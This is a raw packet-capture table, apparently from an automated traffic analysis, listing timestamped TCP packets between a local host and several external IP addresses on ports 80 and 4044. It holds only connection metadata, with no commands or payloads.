                                                                                                                                                                                  Dec 3, 2024 14:01:41.124829054 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.124870062 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.125468969 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.125597954 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.125647068 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.126319885 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.126327038 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.126389980 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.127152920 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.127160072 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.127201080 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.127968073 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.128045082 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.128107071 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.128783941 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.129029036 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.129080057 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.129663944 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.129765987 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.129861116 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.130383015 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.130532026 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.130590916 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.131222963 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.131350994 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.131400108 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.132025003 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.132160902 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.132217884 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.132850885 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.132858038 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.132905960 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.133809090 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.133871078 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.133919954 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.134517908 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.134670019 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.134725094 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.135339022 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.135345936 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.135395050 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.136128902 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.136275053 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.136322975 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.137015104 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.137022018 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.137069941 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.137820005 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.137907982 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.137954950 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.138653040 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.138775110 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.138823986 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.139498949 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.139504910 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.139588118 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.140307903 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.140588999 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.140634060 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.141105890 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.141161919 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.141210079 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.141953945 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.141964912 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.142010927 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.142844915 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.142851114 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.142895937 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.143774986 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.143780947 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.143821955 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.144606113 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.144612074 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.144658089 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.145334959 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.145446062 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.145495892 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.146120071 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.146488905 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.146542072 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.147034883 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.147042036 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.147083998 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.147772074 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.147778034 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.147831917 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.148554087 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.148559093 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.148607969 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.149369001 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.149375916 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.149419069 CET4917780192.168.2.22142.93.65.161
Dec 3, 2024 14:01:41.150306940 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.150326967 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.150382996 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.150971889 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.151006937 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.151077986 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.151789904 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.151946068 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.152020931 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.152627945 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.152683973 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.152733088 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.153430939 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.153464079 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.153517008 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.154263020 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.154373884 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.154443979 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.155241013 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.155246973 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.155297041 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.155996084 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.156013012 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.156056881 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.156786919 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.157052040 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.157095909 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.157603979 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.157615900 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.157665014 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.158432007 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.158462048 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.158620119 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.159336090 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.159732103 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.159806967 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.160078049 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.160692930 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.160748005 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.161042929 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.329176903 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.329263926 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.329493046 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.329652071 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.329660892 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.329732895 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.330476999 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.330653906 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.330704927 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.331187963 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.331360102 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.331417084 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.332117081 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.332338095 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.332396030 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.333076954 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.333195925 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.333300114 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.333889961 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.334063053 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.334176064 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.334793091 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.334799051 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.334840059 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.335539103 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.335587025 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.335633039 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.336417913 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.336425066 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.336472034 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.337270021 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.337397099 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.337445974 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.338114023 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.338124037 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.338157892 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.338990927 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.339236021 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.339278936 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.339724064 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.340193987 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.340250015 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.340652943 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.340934992 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.340991020 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.341175079 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.341285944 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.341327906 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.341746092 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.341871023 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.341919899 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.342376947 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.342382908 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.342427015 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.342907906 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.342914104 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.342956066 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.343547106 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.343669891 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.343719959 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.344172955 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.344350100 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.344389915 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.345036983 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.345396042 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.345494986 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.345947027 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.345959902 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.345994949 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.346678972 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.346781015 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.346846104 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.347457886 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.347464085 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.347510099 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.348246098 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.348328114 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.348367929 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.349095106 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.349101067 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.349148989 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.349875927 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.349915028 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.349955082 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.350719929 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.350728035 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.350769997 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.351712942 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.351725101 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.351767063 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.352395058 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.352401972 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.352444887 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.353424072 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.353430033 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.353471994 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.353988886 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.354207039 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.354252100 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.354887009 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.354963064 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.355015993 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.355647087 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.355722904 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.355762005 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.356535912 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.356542110 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
Dec 3, 2024 14:01:41.356584072 CET | 49177 | 80 | 192.168.2.22 | 142.93.65.161
Dec 3, 2024 14:01:41.357379913 CET | 80 | 49177 | 142.93.65.161 | 192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.357386112 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.357433081 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.358144999 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.358289957 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.358333111 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.358990908 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.359112024 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.359167099 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.359807014 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.360230923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.360302925 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.360627890 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.361152887 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.361196041 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.361447096 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.361453056 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.361618996 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.362296104 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.456258059 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.834060907 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:41.954076052 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.954134941 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:41.961396933 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:42.082778931 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:43.255795002 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:43.467133045 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:43.499309063 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:43.503344059 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:43.623243093 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:43.623296976 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:43.743299961 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:44.101000071 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:44.107923985 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:44.227938890 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:44.302031040 CET40444917831.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:44.339062929 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:44.459059954 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:44.459180117 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:44.462836027 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:44.574717045 CET491784044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:44.582904100 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:45.008366108 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:01:45.128334045 CET8049180178.237.33.50192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:45.128422022 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:01:45.326936960 CET4918080192.168.2.22178.237.33.50
                                                                                                                                                                                  Dec 3, 2024 14:01:45.449124098 CET8049180178.237.33.50192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:45.754352093 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:45.963112116 CET491794044192.168.2.2231.13.224.72
                                                                                                                                                                                  Dec 3, 2024 14:01:45.995404005 CET40444917931.13.224.72192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:45.999705076 CET491794044192.168.2.2231.13.224.72
